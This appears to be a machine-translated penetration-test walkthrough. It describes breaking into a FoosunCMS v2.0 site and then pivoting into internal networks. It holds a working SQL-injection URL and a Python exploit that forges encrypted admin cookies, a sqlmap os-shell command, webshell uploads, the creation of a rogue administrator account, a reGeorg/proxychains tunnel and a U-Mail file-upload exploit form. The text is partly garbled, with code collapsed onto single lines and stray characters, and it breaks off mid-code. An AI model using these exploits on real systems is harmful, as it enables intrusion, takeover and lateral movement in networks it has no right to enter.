Title: A experimental process of roaming from the external network to the internal network at a time

Intranet roaming topology diagram uses login bypass vulnerability to perform backend target website IP: 192.168.31.55, bind the target website IP to www.test.com under the local hosts file (prevent direct access to IP website from loading incompletely), visit www.test.com to get the homepage of the website and find that it is an html static website

After clicking, I found that the website was built by FoosunCMS. After clicking, I found that the website was built by FoosunCMS.

version is v2.0, and there are vulnerabilities that can be exploited. Bypass the administrator account information verification and enter the background directly. It can be said to be a very dangerous exploit. Visit the website backend address: /manage/Index.aspx

Search found that FoosunCMS v2.0 has a login bypass vulnerability. Try to login bypass. Visit the link below to get UserNumber

http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin It is found that UserNumber is encrypted and spliced into cookies to log in successfully

Use SQL injection to get UserNumber, and then splice it with UserName, etc. construct the cookie and log in directly with administrator privileges. The Exp code is as follows:

#coding:utf-8import argparseimport urllibimport tracebackimport base64from Crypto.Cipher import AESfrom binascii import b2a_hex, a2b_hex#################################search keyword：####inurl:/manage/Login.aspx #################################KEY='Guz(%hj7x89H$yuBI0456FtmaT5fvHUFCy76*h%(HilJ$lhj!y6(*jkP87jH7'IV='E4ghj*Ghg7!rNIfb95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7!hg4ui%$hjk'def parse_args(): parser=argparse.ArgumentParser() parser.add_argument('-u', '--url', help='the url', required=True, nargs='+') return parser.parse_args()def run(url): try: usernumber=get_usernumber(url) if usernumber is not None: encrypt_cookie=generate_cookie(usernumber) #Write to cookie write_cookie(url, encrypt_cookie) except Exception: traceback.print_exc()def get_usernumber(url): fullurl=url + '/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin' content=urllib.urlopen(fullurl).read() index=content.index('option value=\'') if index !=-1: usernumber=content[index+15:] usernumber=usernumber[0: content.index('\'')+1] print 'Get usernumber success. Usernumber is :', usernumber return usernumber else: print 'Get usernumber fail' return Nonedef pkcs7padding(data): bs=AES.block_size padding=bs - len(data) % bs padding_text=chr(padding) * padding return data + padding_textdef generate_cookie(usernumber): orgstr='%s,admin,0,1,False'%(usernumber,) cryptor=AES.new(KEY[0:32], AES.MODE_CBC, IV[0:16]) ciphertext=cryptor.encrypt(pkcs7padding(orgstr)) ciphertext=base64.b64encode(ciphertext) return ciphertextdef write_cookie(url, ciphercookie): print 'Generate Cookie[SITEINFO]:', ciphercookie print 'Now you can write cookie and access the url: %s/manage/index.aspx'%(url,)if __name__=='__main__': args=parse_args() try: if args.url is not None: run(args.url[0]) except Exception, e: print 'python Foosun_exp.py -u [url]' After execution, the encrypted bypassed background login cookie was successfully obtained.

Write encrypted cookies printed by scripts to browser cookies using EditThis Cookie

Then visit http://www.test.com/manage/Index.aspx to successfully enter the background

Note: If the following situation occurs when executing the exp script, you need to install the python Crypto.Cipher encryption package

Install the encryption package

pipinstallpycryptodome uses file upload vulnerability to obtain the shell and enter the background. After entering the control panel system parameter settings, it is found that the upload file can be modified at the uploading point, and the aspx format can be added to it.

Files can be uploaded in the plug-in management advertising system. Try to upload an aspx one-sentence script and found that it was successfully uploaded and returned to the uploaded file path Using a kitchen knife to successfully connect to the uploaded aspx one-sentence script, but found that the permission is not the system permission. Try to use sqlmap to get interactive shell and put the injection point found above into sqlmap and run http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=% 27admin uses sqlmap to obtain interactive shellsqlmap.py-u'http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin'--os-shell successfully obtained the interactive shell and was system permission Use SQLmap to try to write a sentence Trojan (Supplementary: Pay attention to the escape problem) Use kitchen knife to successfully connect Use SQLmap interactive shell to fail to add the host ip, showing that the password does not meet the requirements of the password policy group, the complexity is too low, and the password complexity is strengthened. Add the user again and finds that the command execution is successful and the added user is added to the administrator group Use Sqlmap interactive shell to find that the host ip is 192.168.1.123, not the 192.168.31.55 we visited. Then it is possible that the IP that is not in the same network segment is forwarded to the same network segment. set up a proxy to penetrate another intranet and roam intranet. Through checking, it found that it opened port 3389, and used the administrator account password added earlier to log in to 3389 remotely. It was found that there was a notepad on the desktop of the administrator administrator user who found two account passwords.

Use the discovered account to log in to the routing interface of www.test.com port :8080 to log in to the routing interface of port :080, which restricts IP login. We guessed that it may be that only intranet IP login can be set. Then we successfully logged in after setting up a proxy locally. It was found that it was an intranet routing website. After logging in to the route, we found that there was a website of 172.19.23.123 under the router. Here we use the reGeorge+proxychains proxy in Kali to perform intranet penetration. First, we set the configuration file of proxychains, open the kali terminal and enter the following command, and remove the comment character before dynamic_chain # of vi /etc/proxychains.conf After setting the port, save and exit, switch to the reGeorg-master file to open the proxy tunnel, return to the following page to indicate the proxy success pythonreGeorgSocksProxy.py-p2333-l0.0.0.0-uhttp://www.test.com/files/tunnel.aspx

Use a proxy to open Firefox browser. Note: Add proxychains before the command=Use a proxy to execute this command proxychainsfirefox

Using the account password we found above, we successfully logged in to the website. found that this website is a u-mailCMS. We found that a very serious file upload vulnerability broke out in u-mail. You can try whether this website has fixed this vulnerability. The Exp code is as follows: meta http-equiv='Content-Type' content='text/html; charset=utf-8' /FORM name=form1 method=post action='http://172.19.23.123/webmail/client/mail/index.php?module=operateaction=attach-upload' enctype=multipart/form-dataʏ炫炫炫為input type='file' name='Filedata' size='30'INPUT type=submit value=ʏ现name=Submit Use the proxy to open the constructed html page, and then upload a php Malaysia with the suffix jpg

After the upload is successful, the file file_id information is displayed.Use the following payload to obtain the currently logged-in user_id of 3http://172.19.23.123/webmail/client/oab/index.php?module=operateaction=member-getpage=1orderby=is_reverse=1keyword=xgk Use the explosive user_id and file_id to construct the uploaded Malaysia file path, and use the PHP resolution vulnerability. After the path is added /.php, it successfully resolves

Summary

1. Access the WEB port of the target system, and then query the target system's CMS system through online fingerprint recognition to be FoosunCMS. There is a historical vulnerability in the background injection vulnerability of the website, and the version is v2.0http://www.test.com2. Visit the following address to obtain the administrator's UserNumberhttp://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin3. Directly access the background page http://www.test.com/manage/Index.aspx4. Directly use sql injection to get UserNumber, then splice it with UserName, etc. construct the cookie and log in directly with administrator privileges. The Exp code is as follows: #coding:utf-8import argparseimport urllibimport tracebackimport base64from Crypto.Cipher imp